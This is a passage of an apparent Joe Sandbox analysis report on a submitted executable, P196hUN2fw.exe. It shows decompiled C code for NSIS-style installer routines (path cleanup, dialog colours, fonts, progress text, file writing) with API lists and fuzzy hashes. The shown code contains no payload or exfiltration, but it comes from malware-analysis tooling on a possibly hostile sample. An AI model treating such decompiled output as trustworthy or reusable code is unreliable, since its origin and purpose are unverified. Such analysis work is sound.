				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040596A(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405928("*?|<>/\":", _t5))) == 0) {
							E00405AB9(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








              0x004061d1
              0x004061d9
              0x004061ed
              0x004061ed
              0x004061f3
              0x00406200
              0x00406200
              0x00406201
              0x00406203
              0x00406207
              0x00406209
              0x00406212
              0x00406214
              0x0040622e
              0x00406236
              0x00406236
              0x0040623b
              0x0040623d
              0x0040623f
              0x00406243
              0x00406244
              0x00406247
              0x0040624f
              0x00406251
              0x00406255
              0x00000000
              0x00000000
              0x0040625b
              0x00406260
              0x00000000
              0x00000000
              0x00000000
              0x00406260
              0x00406265

              APIs
              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\P196hUN2fw.exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
              • CharNextA.USER32(?,"C:\Users\user\Desktop\P196hUN2fw.exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
              • CharPrevA.USER32(?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
              Strings
              • "C:\Users\user\Desktop\P196hUN2fw.exe", xrefs: 0040620B
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004061D0
              • *?|<>/":, xrefs: 00406217
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\user\Desktop\P196hUN2fw.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-305702585
              • Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
              • Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
              • Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
              • Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040408D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040408D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








              0x0040409f
              0x00404133
              0x00000000
              0x00404133
              0x004040b0
              0x004040b4
              0x00000000
              0x00000000
              0x004040ba
              0x004040c3
              0x004040c6
              0x004040c6
              0x004040cc
              0x004040d2
              0x004040d2
              0x004040de
              0x004040e4
              0x004040eb
              0x004040ee
              0x004040f1
              0x004040f3
              0x004040f3
              0x004040fb
              0x00404101
              0x00404101
              0x0040410b
              0x00404110
              0x00404113
              0x00404118
              0x0040411b
              0x0040411b
              0x0040412b
              0x0040412b
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
              • Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
              • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
              • Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040508C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040508C(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ebe4; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405F87(0, _t39, 0x42a050, 0x42a050, _a4);
					}
					_t26 = lstrlenA(0x42a050);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebc8, 0x42a050);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a050;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a050)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a050, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















              0x00405092
              0x0040509e
              0x004050a1
              0x004050a7
              0x004050b3
              0x004050b6
              0x004050b9
              0x004050bf
              0x004050bf
              0x004050c5
              0x004050cd
              0x004050d0
              0x004050ed
              0x004050f1
              0x004050fa
              0x004050fa
              0x00405104
              0x0040510d
              0x00405119
              0x00405120
              0x00405124
              0x00405127
              0x0040513a
              0x00405148
              0x00405148
              0x0040514c
              0x0040514e
              0x00405151
              0x00000000
              0x00405151
              0x004050d2
              0x004050da
              0x004050e2
              0x004050e8
              0x00000000
              0x004050e8
              0x004050e2
              0x004050d0
              0x0040515b

              APIs
              • lstrlenA.KERNEL32(0042A050,00000000,00419517,766DEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
              • lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,766DEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
              • lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,766DEA30), ref: 004050E8
              • SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID:
              • API String ID: 2531174081-0
              • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
              • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
              • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
              • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404957 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404957(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














              0x00404965
              0x00404972
              0x00404978
              0x004049b6
              0x004049b6
              0x004049c5
              0x004049cc
              0x00000000
              0x004049ce
              0x0040497a
              0x00404989
              0x00404991
              0x00404994
              0x004049a6
              0x004049ac
              0x004049b3
              0x00000000
              0x004049b3
              0x00000000

              APIs
              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
              • GetMessagePos.USER32 ref: 0040497A
              • ScreenToClient.USER32 ref: 00404994
              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
              • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
              • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
              • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402C61 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402C61(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x415420; // 0x36e190
					_t11 =  *0x42142c; // 0x36e194
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






              0x00402c6e
              0x00402c7c
              0x00402c82
              0x00402c82
              0x00402c90
              0x00402c92
              0x00402c98
              0x00402c9f
              0x00402ca1
              0x00402ca1
              0x00402cb7
              0x00402cc7
              0x00402cd9
              0x00402cd9
              0x00402ce1

              APIs
              Strings
              • verifying installer: %d%%, xrefs: 00402CB1
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: verifying installer: %d%%
              • API String ID: 1451636040-82062127
              • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
              • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
              • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
              • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E00402736(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402AC1(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E0040596A(_t50) == 0) {
					E00402AC1(0xffffffed);
				}
				E00405AD9(_t50);
				_t26 = E00405AFE(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f418;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004031A9(_t45);
						E00403193(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							E00402F81( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405AB9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405BA5( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402F81(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











              0x00402736
              0x00402738
              0x00402744
              0x00402747
              0x00402751
              0x00402755
              0x00402755
              0x0040275b
              0x00402768
              0x00402770
              0x00402773
              0x00402779
              0x00402787
              0x0040278c
              0x00402790
              0x00402793
              0x0040279c
              0x004027a8
              0x004027ac
              0x004027af
              0x004027b9
              0x004027de
              0x004027c0
              0x004027c5
              0x004027cd
              0x004027d3
              0x004027d8
              0x004027d8
              0x004027e5
              0x004027e5
              0x004027f2
              0x004027f8
              0x0040280a
              0x0040280a
              0x00402810
              0x00402810
              0x0040281b
              0x0040281c
              0x00402820
              0x00402824
              0x0040282a
              0x0040282a
              0x00402831
              0x00402237
              0x00402954
              0x00402960

              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
              • GlobalFree.KERNEL32 ref: 004027E5
              • GlobalFree.KERNEL32 ref: 004027F8
              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
              • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
              • Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
              • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00401D95(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402A9F(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402A9F(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E00405F87(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00405EC3();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











              0x00401d95
              0x00401da0
              0x00401da2
              0x00401daf
              0x00401dc6
              0x00401dcb
              0x00401dd8
              0x00401ddd
              0x00401de1
              0x00401dec
              0x00401df3
              0x00401e05
              0x00401e0b
              0x00401e10
              0x00401e1a
              0x00402577
              0x00401569
              0x004028f9
              0x00402954
              0x00402960

              APIs
              • GetDC.USER32(?), ref: 00401D98
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
              • ReleaseDC.USER32 ref: 00401DCB
              • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CapsCreateDeviceFontIndirectRelease
              • String ID:
              • API String ID: 3808545654-0
              • Opcode ID: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
              • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
              • Opcode Fuzzy Hash: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
              • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00401D3B(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402AC1(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







              0x00401d45
              0x00401d4c
              0x00401d7b
              0x00401d83
              0x00401d8a
              0x00401d8a
              0x00402954
              0x00402960

              APIs
              • GetDlgItem.USER32 ref: 00401D3F
              • GetClientRect.USER32 ref: 00401D4C
              • LoadImageA.USER32 ref: 00401D6D
              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
              • DeleteObject.GDI32(00000000), ref: 00401D8A
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
              • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
              • Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
              • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040484D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E0040484D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
